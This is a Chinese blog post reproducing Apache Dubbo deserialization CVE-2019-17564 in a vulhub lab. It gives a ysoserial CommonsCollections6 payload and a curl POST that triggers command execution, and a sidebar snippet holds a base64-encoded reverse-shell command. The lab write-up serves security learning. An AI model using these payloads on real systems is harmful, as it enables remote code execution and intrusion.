Aapche Dubbo 不安全的 Java 反序列化 (CVE-2019-17564)

最新推荐文章于 2024-03-15 17:44:24 发布
原创 最新推荐文章于 2024-03-15 17:44:24 发布 · 443 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#dubbo #安全 #java

本文讲述了ApacheDubbo2.7.4及更早版本中的Java反序列化漏洞,涉及SpringFramework的HttpInvokerServiceExporter,建议避免暴露给不受信任的客户端并推荐使用安全的消息格式。还详细介绍了如何在Docker环境中搭建并利用ysoserial工具触发漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述

Apache Dubbo 是一个高性能的、基于 Java 的开源 RPC 框架。

Apache Dubbo 支持不同的协议,它的 HTTP 协议处理程序是 Spring Framework 的 .org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter

Spring Framework 的安全警告显示,HttpInvokerServiceExporter中存在不安全的 Java 反序列化,这可能导致 RCE 漏洞:

警告:请注意由于不安全的 Java 反序列化而导致的漏洞:纵的输入流可能导致不需要的代码 因此,不要将 HTTP 调用程序端点暴露给不受信任的客户端 因此,不要将 HTTP 调用程序端点暴露给不受信任的客户端,而仅在您自己的服务之间公开。一般来说,我们强烈建议使用任何其他消息格式(例如 JSON)。

该漏洞影响 Apache Dubbo 2.7.4 及更早版本,在 2.7.5 之后 Dubbo 替换为 .HttpInvokerServiceExportercom.googlecode.jsonrpc4j.JsonRpcServer

参考链接。

漏洞环境及利用

搭建docker环境

访问8080端口

wget https://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz

tar  -xvf  zookeeper-3.3.3.tar.gz  

解压后,进入Zookeeper执行bin目录下的zkCli.sh

./zkCli.sh  -server  192.168.232.128:2181

 获取RPC接口名称

ysoserial下载链接 :下载好之后直接将文件拖至kali桌面.

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

接着用ysoserial工具生成CommonsCollections6的Payload作为POST Body发送到http://192.168.232.128:8080/org.vulhub.api.CalcService即可触发反序列化漏洞:

java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 "touch /tmp/success" > 1.poc                #生成一个创建success的1.poc

curl -XPOST --data-binary @1.poc http://192.168.232.128:8080/org.vulhub.api.CalcService #将Payload作为POST Body发送到靶机.这里记得换成你靶机的IP

这个地方生成payload需要root权限,前面chmod加权限也没有用

可以看到命令执行成功

 

blackK_YC
关注
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 1101
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 2120
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
[CVE-2019-17564] Apache Dubbo deserialization vulnerability
公众号shadow sock7
02-12 1411
参考 https://mp.weixin.qq.com/s/pHnhHMNArAiZPVGR1btZIg https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html
Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)漏洞复现
weixin_48413667的博客
09-14 1477
一、软件介绍 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。 二、漏洞描述 Dubbo可以使用同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 三、影响范围 Apache Dubbo ...
rmi 反序列化漏洞_[漏洞分析]CVE201917564/Apache Dubbo存在反序列化漏洞
weixin_29284885的博客
01-07 284
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理当导致安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1932
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
《Vulhub-Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)
weixin_47118413的博客
12-29 1212
在之前我想起在Vulhub漏洞平台复现过Aapche Dubbo Java反序列化漏洞(CVE-2019-17564),虽然是最新的(CVE-2022-39198)漏洞,但也想把(CVE-2019-17564)分享一下。
rmi 反序列化漏洞_CVE201917564 Apache Dubbo 反序列化漏洞安全通告
weixin_36277690的博客
01-07 307
【背景】2020年2月10号,Apache Dubbo反序列化漏洞(CVE-2019-17564)被公布,使用 Dubbo-Rpc-Http (2.7.3 or lower) 和Spring-Web (5.1.9.RELEASE or lower)的版本可被利用。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容...
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2521
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
安全反序列化_Apache Dubbo反序列化漏洞安全风险通告(CVE201917564)
weixin_39802132的博客
12-11 654
漏洞综述关于Apache DubboApache Dubbo 是一款高性能、轻量级的开源Java RPC框架,该框架在国内应用较为广泛,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。漏洞描述Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,Apache Dubbo HTTP协议中存在反序列化漏洞(CVE-2019-17564...
解决Dubbo反序列化时报错
最新发布
GUILTYxc的博客
03-15 7029
STRICT参考官网关于类检查机制的说明我使用的版本默认的检查模式为STRICT,禁止反序列化所有在允许序列化列表(白名单)中的类。共有三个模式:STRICT 严格检查,WARN 告警,DISABLE 禁用。
Apache的管理以及优化
b_______的博客
01-29 610
文章目录前言一、Apache的作用和安装启用1.Apache的作用2.Apache的安装二、Aapche的基本信息和基本配置1.基本信息以及帮助手册的获取1.基本信息2.帮助手册的获取2.基本配置1.访问控制2.默认发布目录的管理3.Apache的虚拟主机1.建立目录2.建立测试页文件3.修改本地解析4.Aanche的语言支持1.php2.cgi总结 前言 一、Apache的作用和安装启用 1.Apache的作用 在web被访问时通常使用http://的方式 http:// 超文本传输协议 h..
JAVA】Spring HTTP Invoker 远程服务调用
三也_攻城狮
01-26 3302
远程服务调用在实际的项目中很常用,在多重方式中,HTTP应该算是比较常用的,对客户端来说也很方便 但是spring http invoker只支持JAVA语言,结构简单,只依赖与spring框架本身。 首先我们来看服务端(依赖于WEB容器来启动,tomcat/jetty) 定义接口和接口实现类,这里的接口和下面的客户端的接口是同一个 remote-servlet.xml
Aapche Dubbo Java反序列化漏洞复现
Shanfenglan's blog
12-13 1764
文章目录1. CVE-2019-17564原理利用 1. CVE-2019-17564 原理 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 影响版本:Apac
mysql堡垒机漏洞_齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析
weixin_42571280的博客
02-02 515
基本信息引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294补丁信息:该漏洞的修复补丁已于2019年6月25日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。漏洞复现如下图,通过在传递参数”service=`id`”,成功执行命令,并回显命令执行结果。源代码分析首先,定位到/audit/data_provider.php,...
Dubbo, Hessian 序列化注意事项
偶尔记一下 - mybatis.io
10-28 3324
最近遇到一个问题,A 服务调用 B 服务时,返回值反序列化时,POJO对象变成了Map类型。在B服务单独测试的时候一直还原了,在 A 服务进行测试的时候,跟到序列化数据时才看到原因。 原因很简单 A 服务的接口方法返回的结果是一个接口,接口的实现在 A 服务的 API 包中,因此在 B 服务找到该接口真正的实现类,在 B 服务调用接口返回结果反序列化到具体的类型时,就会以 Map 类型进...
java反序列化漏洞利用工具_Apache Dubbo 反序列化漏洞
weixin_39579468的博客
12-02 639
Apache Dubbo 反序列化漏洞早在2019年开发者社区就有谈到这个 http 协议漏洞问题,近期360灵腾安全实验室判断漏洞等级为高,利用难度低,威胁程度高。 建议升级 dubbo 版本,避免遭受黑客攻击。漏洞描述Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled....
Dubbo学习(一)Dubbo爆出严重漏洞!可导致网站被控制、数据泄露!附解决方案
GaoXiR的博客
02-16 3832
2020年2月13日,华为云安全团队监测到应用广泛的Apache Dubbo出现一个较为严重的漏洞:反序列化漏洞(漏洞编号:CVE-2019-17564)。攻击者利用该漏洞,可在目标网站上远程执行恶意代码,最终导致网站被控制、数据泄露等。目前,华为云Web应用防火墙(Web Application Firewall,WAF)提供了对该漏洞的防护。 一、漏洞原理 Apache Dubbo是一款应用广...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值